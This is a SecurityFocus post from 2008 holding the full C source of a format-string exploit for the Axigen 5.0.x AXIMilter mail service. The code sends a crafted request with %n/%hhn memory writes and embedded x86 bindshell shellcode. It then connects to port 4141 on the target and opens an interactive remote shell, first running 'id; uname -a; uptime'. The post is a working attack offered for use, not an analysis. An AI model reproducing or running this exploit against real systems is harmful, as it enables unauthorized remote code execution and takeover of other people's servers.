AXIGEN 5.0.x AXIMilter Format String Exploit Jan 20 2008 10:24PM
hempel (hempel bol com br)
/*
* Axigen 5.0.x AXIMilter Format String Exploit
*
* by hempel (JAN 16 2008)
*
* thx to mu-b (digit-labs.org)
*
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>
#include <string.h>

char buf[] =
"FROM:\r\nEHLO:\r\nCNIP:\r\nCNPO:\r\nCNHO: "
/* offsets */
"\xb8\x96\x05\x08\xb9\x96\x05\x08\xba\x96\x05\x08\xbb\x96\x05\x08"
"\xbc\x96\x05\x08\xbd\x96\x05\x08\xbe\x96\x05\x08\xbf\x96\x05\x08"
"\xc0\x96\x05\x08"
/* format string */
"%35u%6851$n%70u%6850$hhn%47u%6846$hhn%36u%6854$hhn%31u%6853$hhn%"
"17u%6852$hhn%134u%6847$hhn%111u%6848$hhn%259u%6849$hhn"
"\r\nRCPT:\r\nVERI: "
/* bindshell code (port 4141) */
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xdc"
"\xc8\x06\xb7\x83\xeb\xfc\xe2\xf4\xed\x13\x55\xf4\x8f\xa2\x04\xdd"
"\xba\x90\x9f\x3e\x3d\x05\x86\x21\x9f\x9a\x60\xdf\xcc\xe5\x60\xe4"
"\x55\x29\x6c\xd1\x84\x98\x57\xe1\x55\x29\xcb\x37\x6c\xae\xd7\x54"
"\x11\x48\x54\xe5\x8a\x8b\x8f\x56\x6c\xae\xcb\x37\x4f\xa2\x04\xee"
"\x6c\xf7\xcb\x37\x95\xb1\xff\x07\xd7\x9a\x6e\x98\xf3\xbb\x6e\xdf"
"\xf3\xaa\x6f\xd9\x55\x2b\x54\xe4\x55\x29\xcb\x37"
"\r\nPASS:\r\n";

static int
shell_sock (char *host, int port)
{
struct sockaddr_in addr;
int sockfd;

sockfd = socket(PF_INET, SOCK_STREAM, 0);
if (sockfd == -1) {
perror ("socket");
return 0;
}

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);

if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror ("connect");
return 0;
}

return sockfd;
}

static void
shell_run (int sockfd)
{
int rs;
fd_set rset;
char rbuf[1024], *cmd = "id; uname -a; uptime\n";

write(sockfd, cmd, strlen(cmd));

while (1) {
FD_ZERO (&rset);
FD_SET (sockfd, &rset);
FD_SET (STDIN_FILENO, &rset);

select (sockfd + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET (sockfd, &rset)) {
rs = read (sockfd, rbuf, sizeof(rbuf) - 1);
if (rs <= 0) {
perror("read");
return;
}
rbuf[rs] = '\0';
printf ("%s", rbuf);
}

if (FD_ISSET (STDIN_FILENO, &rset)) {
rs = read(STDIN_FILENO, rbuf, sizeof(rbuf) - 1);
if (rs > 0) {
rbuf[rs] = '\0';
write (sockfd, rbuf, rs);
}
}
}
}

int
main(int argc, char **argv)
{
int sockfd, port, buf_len;
struct sockaddr_in addr;
char *host;

printf("AXIGEN 5.0.x AXIMilter format string Exploit by hempel\n");

if (argc < 2) {
printf("%s host port\n", *argv);
return 0;
}

host = argv[1];
port = atoi(argv[2]);

sockfd = socket(PF_INET, SOCK_STREAM, 0);
if(sockfd == -1) {
perror("socket");
return -1;
}

addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);

if (connect(sockfd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
perror("connect");
return -1;
}

buf_len = sizeof(buf) - 1;
if (write(sockfd, buf, buf_len) == -1) {
perror("write");
return -1;
}
close(sockfd);

printf("trying shell at %s:4141 ...", host);
fflush(stdout);
sockfd = shell_sock(host, 4141);
if (sockfd) {
printf("w00t!\n");
shell_run(sockfd);
} else {
printf("nope!\n");
}

return 0;
}

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus